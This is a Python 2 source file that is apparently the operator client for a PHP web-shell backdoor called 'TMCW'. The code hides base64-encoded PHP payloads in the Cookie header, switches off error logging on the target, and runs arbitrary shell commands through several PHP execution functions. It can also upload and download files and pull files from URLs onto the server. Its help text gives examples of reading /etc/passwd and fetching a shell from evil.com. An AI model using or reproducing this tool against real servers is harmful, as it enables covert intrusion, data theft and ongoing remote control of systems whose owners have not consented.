firescript.py

1. #!/usr/bin/python
2. import sys
3. import os
4. import urllib2
5. import base64
6. import time
7. import re
8. import platform
9. from urlparse import urlparse
10.  
11. def get( t, url, p, pwd="", c="", r="https://www.google.com/search?", out=None):
12. userAgent = 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'
13. fcmd = "@error_reporting(0);ini_set('error_log',NULL);ini_set('log_errors',1);ini_set('max_execution_time',0);set_time_limit(0);"
14. p = 'p='+str(p)
15. if len(pwd) > 0:
16. fcmd += "chdir('"+pwd.strip()+"');"
17. if t == "exec":
18. fcmd += 'function ex($c) {$o = \'\';if (function_exists(\'system\')) {ob_start();@system($c);$o = ob_get_clean();}elseif (function_exists(\'passthru\')) {ob_start();@passthru($c);$o = ob_get_clean();}elseif (is_resource($f = @popen($c,"r"))) {$o = "";while(!@feof($f))$o .= fread($f,1024);pclose($f);}elseif (function_exists(\'shell_exec\')) {$o = @shell_exec($c);}elseif (function_exists(\'exec\')) {@exec($c,$o);$o = @join("\\r\\n",$o);}else{$o = "[!]: could not execute commands";}return $o;}'+"echo ex('" + c.replace( "'", '\\\'' ) + "');"
19. elif t == "#upload":
20. if os.path.isfile(c):
21. if out == None:
22. fcmd += upload( c )
23. else:
24. fcmd += upload( out )
25.  
26. fp = base64.b64encode( open(c, "r").read() )
27. p += "&t="+fp.replace("=", "")
28. else:
29. return "Error, wrong file"
30. elif t == "#download":
31. fcmd += download(c)
32. elif t == "#downurl":
33. fcmd += downurl(c)
34. else:
35. fcmd += c
36.  
37. fcmd = encode( fcmd )
38. headers = { \
39. 'User-agent': userAgent, \
40. 'Cookie': fcmd, \
41. 'Referer': r \
42. }
43. e = urllib2.Request(url, p, headers=headers)
44. try:
45. response = urllib2.urlopen(e).read()
46.  
47. except:
48. response = "Error"
49. return response.replace("<apple>","")
50.  
51. def encode( cmd ):
52. cmd = base64.b64encode(cmd)
53. max = len(cmd)
54. c1 = ''
55. c2 = ''
56. for i in range(0,max / 2):
57. c1 += cmd[i]
58. for i in range(max / 2,max):
59. c2 += cmd[i]
60. finalc = 'a='+c1+';b='+c2.replace("=", "")
61. return finalc
62.  
63.  
64. def upload( fileName ):
65. run = "file_put_contents( '"+ fileName +"', base64_decode($_POST['t']));"\
66. "if ( file_exists('"+fileName+"') && is_file('"+fileName+"') && md5(base64_decode($_POST['t']) == md5(file_get_contents('"+fileName+"') ) ) )"\
67. "{echo 'Seccess';}"\
68. "else{echo 'Failed';}"\
69. "echo ' to Uploaded !';"
70. return run
71.  
72. def download( fileName ):
73. run = "if ( is_readable('"+ fileName +"') ){echo file_get_contents('"+ fileName +"', 'r');}else{echo 'ER00R';}"
74. return run
75.  
76. def downurl( fileName ):
77. run = "echo 'Uploaded ';if ( file_put_contents( \""+ fileName +"\", file_get_contens($_SERVER['HTTP_REFERER'])) )"\
78. "{echo 'Seccess !';}else{echo 'Failed !';}"
79. return run
80.  
81. def is_valid_url(url):
82. regex = re.compile(
83. r'^https?://' # http:// or https://
84. r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?|' # domain...
85. r'localhost|' # localhost...
86. r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
87. r'(?::\d+)?' # optional port
88. r'(?:/?|[/?]\S+)$', re.IGNORECASE)
89. return url is not None and regex.search(url)
90.  
91. def helpm( t ):
92. if t == "url":
93. return "Enter the php file URL path, EX: http://example.com/TMCW .php, etc"
94. else:
95. return "No extra information needed for this option!"
96.  
97. def checkpass( u, p ):
98. ofc = "mojo"
99. tmp = get( "", u, p, "", "echo '"+ofc+"';")
100. if ofc in tmp:
101. return True
102. else:
103. return False
104.  
105. def finput( m, t=None, f=False, url=""):
106. tmp = str(m)
107. tmpinput = raw_input( tmp )
108.  
109. if tmpinput.lower() == "exit":
110. print("[#]: Exiting...")
111. sys.exit()
112. elif ( f == True ):
113. if tmpinput.lower() == "help":
114. print( helpm("url") )
115. tmpinput = finput( tmp, t, True)
116. if t == "url":
117. if not is_valid_url(tmpinput):
118. print("[!]: UNvalid URL !")
119. tmpinput = finput( tmp, t, True)
120. else:
121. return tmpinput
122. elif t == "pass":
123. sys.stdout.write("[#]: Connecting... \r")
124. if tmpinput == "":
125. tmpinput = "TMCW"
126. if checkpass( url, tmpinput ) == False:
127. sys.stdout.write("[!]: Wrong Password ! \r\n")
128. tmpinput = finput( tmp, t, True, url)
129. else:
130. print("[#]: Connected ")
131. return tmpinput
132.  
133. else:
134. return tmpinput
135.  
136. def options( user, domain, password, pwd, url ):
137. option = "exec"
138.  
139. print("Enter \"#help\" to see avalible options.")
140. while option != "exit":
141. if "dows" in platform.system():
142. shell = user+"@"+domain+":"+pwd+"# "
143. else:
144. shell = "\033[0;31m"+user+ "\033[1;36m@\033[1;32m"+domain+"\033[1;30m:\033[1;36m"+pwd+"\033[1;31m#\033[m "
145. tmp = raw_input(shell)
146. if tmp == "#help":
147. print("""OPTIONS:
148. #help\t\tPrint this menu.
149. #upload\tUpload file from clint to server.
150. \t\t EX: #upload /path/shell.php /server/bak.php
151. #download\tDownload a file from the server.
152. \t\t EX: #download /etc/passwdx
153. #downurl\tDownload file from URL to server.
154. \t\t EX: #downurl http://evil.com/shell.php output.php
155. #php\t\tExecute PHP eval codes.
156. \t\t EX: #php echo 'apple';""")
157.  
158. elif "#" in tmp:
159. tmp = tmp.split(" ")
160. if tmp[0] == "#upload":
161. if not tmp[2] and len(tmp[1]) > 0 :
162. print( "[#]: " + get(tmp[0], url, password, pwd, tmp[1] ) )
163. elif len(tmp[1]) > 0 and len(tmp[2]) > 0:
164. print( "[#]: " + get(tmp[0], url, password, pwd, tmp[1], None, tmp[2] ) )
165. else:
166. print("[!]: Error, Wrong input")
167. elif tmp[0] == "#download":
168. if len(tmp[1]) > 0 and len(tmp) == 2:
169.  
170. down = get(tmp[0], url, password, pwd, tmp[1] )
171. finfo = tmp[1].replace("\\","/").split("/")
172. fname = finfo[len(finfo)-1]
173. print("[+]: Downloading..."+fname)
174.  
175. open(fname, "w").write( down )
176. if os.path.isfile(fname):
177. print( "[+]: File saved to :" + fname )
178. else:
179. print( "[!]: Error, Couldn't Download File" )
180. else:
181. print("[!]: Error, Wrong input")
182. elif tmp[0] == "#downurl":
183. if len(tmp[1]) > 0 and len(tmp[2]) > 0:
184. print( "[+]: " + get(tmp[0], url, password, pwd, tmp[1] ) )
185. else:
186. print("[!]: Error, Wrong input. check \"#help\"")
187. elif tmp[0] == "#php":
188. tmp[0] = ""
189. print( get("", url, password, pwd, " ".join(tmp) ) )
190. elif "cd" in tmp:
191. tmp = tmp.split(" ")
192. if tmp[0].lower() == "cd" and len(tmp) > 1:
193. if "\\" in tmp[1] or "/" in tmp[1]:
194. pwd = get("", url, password, tmp[1], "echo getcwd();")
195. else:
196. if "\\" in pwd:
197. pwd = get("", url, password, pwd+"\\"+tmp[1], "echo getcwd();")
198. else:
199. pwd = get("", url, password, pwd+"/"+tmp[1], "echo getcwd();")
200. else:
201. print("[!]: Change with single command only.")
202. elif tmp == "exit":
203. print("[#]: Exiting...")
204. sys.exit()
205. else:
206. print( get("exec", url, password, pwd, tmp ).strip() )
207.  
208. def main():
209.  
210. burl = finput("[+]: Enter php BackDoor URL: ", "url", True)
211. password = finput("[+]: Password (defualt TMCW): ", "pass", True, burl)
212.  
213. pw = get("", burl, password, "", "echo getcwd();")
214. domain = urlparse(burl)[1]
215. user = get("", burl, password, "", "$r = posix_getpwuid(posix_getuid());echo $r['name'];")
216.  
217. #print( get( '#upload', burl , password, pw, "x.txt", None, "xxx.TXT" ) )
218.  
219. options(user, domain, password, pw, burl )
220.  
221. if __name__ == "__main__":
222. print(" @TMCW- SecretFiles ")
223. print(" Please upload the php backdoor file to your web server and follow the instractions. For help enter help, exit to exit!")
224. try:
225. main()
226. except:
227. print("[!]: Exiting...")